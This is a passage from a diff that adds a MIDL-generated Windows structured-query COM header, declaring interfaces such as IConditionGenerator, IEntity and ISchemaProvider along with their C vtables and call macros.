+            /* [in] */ STRUCTURED_QUERY_RESOLVE_OPTION sqro,
+            /* [annotation][in] */ 
+            _In_opt_  const SYSTEMTIME *pstReferenceTime,
+            /* [in] */ REFIID riid,
+            /* [iid_is][out] */ void **ppv);
+        
+        END_INTERFACE
+    } IConditionFactory2Vtbl;
+
+    interface IConditionFactory2
+    {
+        CONST_VTBL struct IConditionFactory2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IConditionFactory2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IConditionFactory2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IConditionFactory2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IConditionFactory2_MakeNot(This,pcSub,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeNot(This,pcSub,fSimplify,ppcResult) ) 
+
+#define IConditionFactory2_MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult)	\
+    ( (This)->lpVtbl -> MakeAndOr(This,ct,peuSubs,fSimplify,ppcResult) ) 
+
+#define IConditionFactory2_MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult)	\
+    ( (This)->lpVtbl -> MakeLeaf(This,pszPropertyName,cop,pszValueType,ppropvar,pPropertyNameTerm,pOperationTerm,pValueTerm,fExpand,ppcResult) ) 
+
+#define IConditionFactory2_Resolve(This,pc,sqro,pstReferenceTime,ppcResolved)	\
+    ( (This)->lpVtbl -> Resolve(This,pc,sqro,pstReferenceTime,ppcResolved) ) 
+
+
+#define IConditionFactory2_CreateTrueFalse(This,fVal,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateTrueFalse(This,fVal,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateNegation(This,pcSub,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateNegation(This,pcSub,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateCompoundFromObjectArray(This,ct,poaSubs,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateCompoundFromObjectArray(This,ct,poaSubs,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateCompoundFromArray(This,ct,ppcondSubs,cSubs,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateCompoundFromArray(This,ct,ppcondSubs,cSubs,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateStringLeaf(This,propkey,cop,pszValue,pszLocaleName,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateStringLeaf(This,propkey,cop,pszValue,pszLocaleName,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateIntegerLeaf(This,propkey,cop,lValue,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateIntegerLeaf(This,propkey,cop,lValue,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateBooleanLeaf(This,propkey,cop,fValue,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateBooleanLeaf(This,propkey,cop,fValue,cco,riid,ppv) ) 
+
+#define IConditionFactory2_CreateLeaf(This,propkey,cop,propvar,pszSemanticType,pszLocaleName,pPropertyNameTerm,pOperationTerm,pValueTerm,cco,riid,ppv)	\
+    ( (This)->lpVtbl -> CreateLeaf(This,propkey,cop,propvar,pszSemanticType,pszLocaleName,pPropertyNameTerm,pOperationTerm,pValueTerm,cco,riid,ppv) ) 
+
+#define IConditionFactory2_ResolveCondition(This,pc,sqro,pstReferenceTime,riid,ppv)	\
+    ( (This)->lpVtbl -> ResolveCondition(This,pc,sqro,pstReferenceTime,riid,ppv) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IConditionFactory2_INTERFACE_DEFINED__ */
+
+
+#ifndef __IConditionGenerator_INTERFACE_DEFINED__
+#define __IConditionGenerator_INTERFACE_DEFINED__
+
+/* interface IConditionGenerator */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IConditionGenerator;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("92D2CC58-4386-45a3-B98C-7E0CE64A4117")
+    IConditionGenerator : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Initialize( 
+            /* [in] */ __RPC__in_opt ISchemaProvider *pSchemaProvider) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RecognizeNamedEntities( 
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [in] */ LCID lcidUserLocale,
+            /* [in] */ __RPC__in_opt ITokenCollection *pTokenCollection,
+            /* [out][in] */ __RPC__inout_opt INamedEntityCollector *pNamedEntities) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GenerateForLeaf( 
+            /* [in] */ __RPC__in_opt IConditionFactory *pConditionFactory,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValueType,
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValue2,
+            /* [in] */ __RPC__in_opt IRichChunk *pPropertyNameTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pOperationTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pValueTerm,
+            /* [in] */ BOOL automaticWildcard,
+            /* [out] */ __RPC__out BOOL *pNoStringQuery,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppQueryExpression) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE DefaultPhrase( 
+            /* [unique][in] */ LPCWSTR pszValueType,
+            /* [in] */ const PROPVARIANT *ppropvar,
+            /* [in] */ BOOL fUseEnglish,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IConditionGeneratorVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IConditionGenerator * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IConditionGenerator * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IConditionGenerator * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
+            __RPC__in IConditionGenerator * This,
+            /* [in] */ __RPC__in_opt ISchemaProvider *pSchemaProvider);
+        
+        HRESULT ( STDMETHODCALLTYPE *RecognizeNamedEntities )( 
+            __RPC__in IConditionGenerator * This,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
+            /* [in] */ LCID lcidUserLocale,
+            /* [in] */ __RPC__in_opt ITokenCollection *pTokenCollection,
+            /* [out][in] */ __RPC__inout_opt INamedEntityCollector *pNamedEntities);
+        
+        HRESULT ( STDMETHODCALLTYPE *GenerateForLeaf )( 
+            __RPC__in IConditionGenerator * This,
+            /* [in] */ __RPC__in_opt IConditionFactory *pConditionFactory,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszPropertyName,
+            /* [in] */ CONDITION_OPERATION cop,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValueType,
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [unique][in] */ __RPC__in_opt LPCWSTR pszValue2,
+            /* [in] */ __RPC__in_opt IRichChunk *pPropertyNameTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pOperationTerm,
+            /* [in] */ __RPC__in_opt IRichChunk *pValueTerm,
+            /* [in] */ BOOL automaticWildcard,
+            /* [out] */ __RPC__out BOOL *pNoStringQuery,
+            /* [retval][out] */ __RPC__deref_out_opt ICondition **ppQueryExpression);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *DefaultPhrase )( 
+            IConditionGenerator * This,
+            /* [unique][in] */ LPCWSTR pszValueType,
+            /* [in] */ const PROPVARIANT *ppropvar,
+            /* [in] */ BOOL fUseEnglish,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase);
+        
+        END_INTERFACE
+    } IConditionGeneratorVtbl;
+
+    interface IConditionGenerator
+    {
+        CONST_VTBL struct IConditionGeneratorVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IConditionGenerator_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IConditionGenerator_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IConditionGenerator_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IConditionGenerator_Initialize(This,pSchemaProvider)	\
+    ( (This)->lpVtbl -> Initialize(This,pSchemaProvider) ) 
+
+#define IConditionGenerator_RecognizeNamedEntities(This,pszInputString,lcidUserLocale,pTokenCollection,pNamedEntities)	\
+    ( (This)->lpVtbl -> RecognizeNamedEntities(This,pszInputString,lcidUserLocale,pTokenCollection,pNamedEntities) ) 
+
+#define IConditionGenerator_GenerateForLeaf(This,pConditionFactory,pszPropertyName,cop,pszValueType,pszValue,pszValue2,pPropertyNameTerm,pOperationTerm,pValueTerm,automaticWildcard,pNoStringQuery,ppQueryExpression)	\
+    ( (This)->lpVtbl -> GenerateForLeaf(This,pConditionFactory,pszPropertyName,cop,pszValueType,pszValue,pszValue2,pPropertyNameTerm,pOperationTerm,pValueTerm,automaticWildcard,pNoStringQuery,ppQueryExpression) ) 
+
+#define IConditionGenerator_DefaultPhrase(This,pszValueType,ppropvar,fUseEnglish,ppszPhrase)	\
+    ( (This)->lpVtbl -> DefaultPhrase(This,pszValueType,ppropvar,fUseEnglish,ppszPhrase) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IConditionGenerator_INTERFACE_DEFINED__ */
+
+
+#ifndef __IInterval_INTERFACE_DEFINED__
+#define __IInterval_INTERFACE_DEFINED__
+
+/* interface IInterval */
+/* [unique][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IInterval;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("6BF0A714-3C18-430b-8B5D-83B1C234D3DB")
+    IInterval : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetLimits( 
+            /* [out] */ __RPC__out INTERVAL_LIMIT_KIND *pilkLower,
+            /* [out] */ __RPC__out PROPVARIANT *ppropvarLower,
+            /* [out] */ __RPC__out INTERVAL_LIMIT_KIND *pilkUpper,
+            /* [out] */ __RPC__out PROPVARIANT *ppropvarUpper) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IIntervalVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IInterval * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IInterval * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IInterval * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLimits )( 
+            __RPC__in IInterval * This,
+            /* [out] */ __RPC__out INTERVAL_LIMIT_KIND *pilkLower,
+            /* [out] */ __RPC__out PROPVARIANT *ppropvarLower,
+            /* [out] */ __RPC__out INTERVAL_LIMIT_KIND *pilkUpper,
+            /* [out] */ __RPC__out PROPVARIANT *ppropvarUpper);
+        
+        END_INTERFACE
+    } IIntervalVtbl;
+
+    interface IInterval
+    {
+        CONST_VTBL struct IIntervalVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IInterval_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IInterval_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IInterval_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IInterval_GetLimits(This,pilkLower,ppropvarLower,pilkUpper,ppropvarUpper)	\
+    ( (This)->lpVtbl -> GetLimits(This,pilkLower,ppropvarLower,pilkUpper,ppropvarUpper) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IInterval_INTERFACE_DEFINED__ */
+
+
+#ifndef __IMetaData_INTERFACE_DEFINED__
+#define __IMetaData_INTERFACE_DEFINED__
+
+/* interface IMetaData */
+/* [unique][uuid][object][helpstring] */ 
+
+
+EXTERN_C const IID IID_IMetaData;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("780102B0-C43B-4876-BC7B-5E9BA5C88794")
+    IMetaData : public IUnknown
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE GetData( 
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszKey,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszValue) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IMetaDataVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IMetaData * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IMetaData * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IMetaData * This);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetData )( 
+            IMetaData * This,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszKey,
+            /* [annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszValue);
+        
+        END_INTERFACE
+    } IMetaDataVtbl;
+
+    interface IMetaData
+    {
+        CONST_VTBL struct IMetaDataVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IMetaData_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IMetaData_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IMetaData_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IMetaData_GetData(This,ppszKey,ppszValue)	\
+    ( (This)->lpVtbl -> GetData(This,ppszKey,ppszValue) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IMetaData_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_structuredquery_0000_0007 */
+/* [local] */ 
+
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0007_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_structuredquery_0000_0007_v0_0_s_ifspec;
+
+#ifndef __IEntity_INTERFACE_DEFINED__
+#define __IEntity_INTERFACE_DEFINED__
+
+/* interface IEntity */
+/* [unique][object][uuid][helpstring] */ 
+
+
+EXTERN_C const IID IID_IEntity;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("24264891-E80B-4fd3-B7CE-4FF2FAE8931F")
+    IEntity : public IUnknown
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE Name( 
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszName) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Base( 
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pBaseEntity) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Relationships( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pRelationships) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetRelationship( 
+            /* [in] */ __RPC__in LPCWSTR pszRelationName,
+            /* [retval][out] */ __RPC__deref_out_opt IRelationship **pRelationship) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE MetaData( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE NamedEntities( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pNamedEntities) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetNamedEntity( 
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [retval][out] */ __RPC__deref_out_opt INamedEntity **ppNamedEntity) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE DefaultPhrase( 
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IEntityVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IEntity * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IEntity * This);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Name )( 
+            IEntity * This,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszName);
+        
+        HRESULT ( STDMETHODCALLTYPE *Base )( 
+            __RPC__in IEntity * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pBaseEntity);
+        
+        HRESULT ( STDMETHODCALLTYPE *Relationships )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pRelationships);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetRelationship )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in LPCWSTR pszRelationName,
+            /* [retval][out] */ __RPC__deref_out_opt IRelationship **pRelationship);
+        
+        HRESULT ( STDMETHODCALLTYPE *MetaData )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData);
+        
+        HRESULT ( STDMETHODCALLTYPE *NamedEntities )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pNamedEntities);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetNamedEntity )( 
+            __RPC__in IEntity * This,
+            /* [in] */ __RPC__in LPCWSTR pszValue,
+            /* [retval][out] */ __RPC__deref_out_opt INamedEntity **ppNamedEntity);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *DefaultPhrase )( 
+            IEntity * This,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase);
+        
+        END_INTERFACE
+    } IEntityVtbl;
+
+    interface IEntity
+    {
+        CONST_VTBL struct IEntityVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IEntity_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IEntity_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IEntity_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IEntity_Name(This,ppszName)	\
+    ( (This)->lpVtbl -> Name(This,ppszName) ) 
+
+#define IEntity_Base(This,pBaseEntity)	\
+    ( (This)->lpVtbl -> Base(This,pBaseEntity) ) 
+
+#define IEntity_Relationships(This,riid,pRelationships)	\
+    ( (This)->lpVtbl -> Relationships(This,riid,pRelationships) ) 
+
+#define IEntity_GetRelationship(This,pszRelationName,pRelationship)	\
+    ( (This)->lpVtbl -> GetRelationship(This,pszRelationName,pRelationship) ) 
+
+#define IEntity_MetaData(This,riid,pMetaData)	\
+    ( (This)->lpVtbl -> MetaData(This,riid,pMetaData) ) 
+
+#define IEntity_NamedEntities(This,riid,pNamedEntities)	\
+    ( (This)->lpVtbl -> NamedEntities(This,riid,pNamedEntities) ) 
+
+#define IEntity_GetNamedEntity(This,pszValue,ppNamedEntity)	\
+    ( (This)->lpVtbl -> GetNamedEntity(This,pszValue,ppNamedEntity) ) 
+
+#define IEntity_DefaultPhrase(This,ppszPhrase)	\
+    ( (This)->lpVtbl -> DefaultPhrase(This,ppszPhrase) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IEntity_INTERFACE_DEFINED__ */
+
+
+#ifndef __IRelationship_INTERFACE_DEFINED__
+#define __IRelationship_INTERFACE_DEFINED__
+
+/* interface IRelationship */
+/* [unique][object][uuid][helpstring] */ 
+
+
+EXTERN_C const IID IID_IRelationship;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("2769280B-5108-498c-9C7F-A51239B63147")
+    IRelationship : public IUnknown
+    {
+    public:
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE Name( 
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszName) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IsReal( 
+            /* [retval][out] */ __RPC__out BOOL *pIsReal) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Destination( 
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pDestinationEntity) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE MetaData( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE DefaultPhrase( 
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IRelationshipVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IRelationship * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IRelationship * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IRelationship * This);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Name )( 
+            IRelationship * This,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszName);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsReal )( 
+            __RPC__in IRelationship * This,
+            /* [retval][out] */ __RPC__out BOOL *pIsReal);
+        
+        HRESULT ( STDMETHODCALLTYPE *Destination )( 
+            __RPC__in IRelationship * This,
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pDestinationEntity);
+        
+        HRESULT ( STDMETHODCALLTYPE *MetaData )( 
+            __RPC__in IRelationship * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *DefaultPhrase )( 
+            IRelationship * This,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase);
+        
+        END_INTERFACE
+    } IRelationshipVtbl;
+
+    interface IRelationship
+    {
+        CONST_VTBL struct IRelationshipVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IRelationship_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IRelationship_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IRelationship_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IRelationship_Name(This,ppszName)	\
+    ( (This)->lpVtbl -> Name(This,ppszName) ) 
+
+#define IRelationship_IsReal(This,pIsReal)	\
+    ( (This)->lpVtbl -> IsReal(This,pIsReal) ) 
+
+#define IRelationship_Destination(This,pDestinationEntity)	\
+    ( (This)->lpVtbl -> Destination(This,pDestinationEntity) ) 
+
+#define IRelationship_MetaData(This,riid,pMetaData)	\
+    ( (This)->lpVtbl -> MetaData(This,riid,pMetaData) ) 
+
+#define IRelationship_DefaultPhrase(This,ppszPhrase)	\
+    ( (This)->lpVtbl -> DefaultPhrase(This,ppszPhrase) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IRelationship_INTERFACE_DEFINED__ */
+
+
+#ifndef __INamedEntity_INTERFACE_DEFINED__
+#define __INamedEntity_INTERFACE_DEFINED__
+
+/* interface INamedEntity */
+/* [unique][uuid][object][helpstring] */ 
+
+
+EXTERN_C const IID IID_INamedEntity;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("ABDBD0B1-7D54-49fb-AB5C-BFF4130004CD")
+    INamedEntity : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetValue( 
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszValue) = 0;
+        
+        virtual /* [local] */ HRESULT STDMETHODCALLTYPE DefaultPhrase( 
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct INamedEntityVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in INamedEntity * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in INamedEntity * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in INamedEntity * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetValue )( 
+            __RPC__in INamedEntity * This,
+            /* [retval][out] */ __RPC__deref_out_opt LPWSTR *ppszValue);
+        
+        /* [local] */ HRESULT ( STDMETHODCALLTYPE *DefaultPhrase )( 
+            INamedEntity * This,
+            /* [retval][annotation][out] */ 
+            _Outptr_opt_  LPWSTR *ppszPhrase);
+        
+        END_INTERFACE
+    } INamedEntityVtbl;
+
+    interface INamedEntity
+    {
+        CONST_VTBL struct INamedEntityVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define INamedEntity_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define INamedEntity_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define INamedEntity_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define INamedEntity_GetValue(This,ppszValue)	\
+    ( (This)->lpVtbl -> GetValue(This,ppszValue) ) 
+
+#define INamedEntity_DefaultPhrase(This,ppszPhrase)	\
+    ( (This)->lpVtbl -> DefaultPhrase(This,ppszPhrase) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __INamedEntity_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISchemaProvider_INTERFACE_DEFINED__
+#define __ISchemaProvider_INTERFACE_DEFINED__
+
+/* interface ISchemaProvider */
+/* [unique][object][uuid][helpstring] */ 
+
+
+EXTERN_C const IID IID_ISchemaProvider;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("8CF89BCB-394C-49b2-AE28-A59DD4ED7F68")
+    ISchemaProvider : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE Entities( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pEntities) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE RootEntity( 
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pRootEntity) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetEntity( 
+            /* [in] */ __RPC__in LPCWSTR pszEntityName,
+            /* [retval][out] */ __RPC__deref_out_opt IEntity **pEntity) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE MetaData( 
+            /* [in] */ __RPC__in REFIID riid,
+            /* [iid_is][retval][out] */ __RPC__deref_out_opt void **pMetaData) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE Localize( 
+            /* [in] */ LCID lcid,
+            /* [in] */ __RPC__in_opt ISchemaLocalizerSupport *pSchemaLocalizerSupport) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE SaveBinary( 
+            /* [in] */ __RPC__in LPCWSTR pszSchemaBinaryPath) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE LookupAuthoredNamedEntity( 
+            /* [in] */ __RPC__in_opt IEntity *pEntity,
+            /* [in] */ __RPC__in LPCWSTR pszInputString,
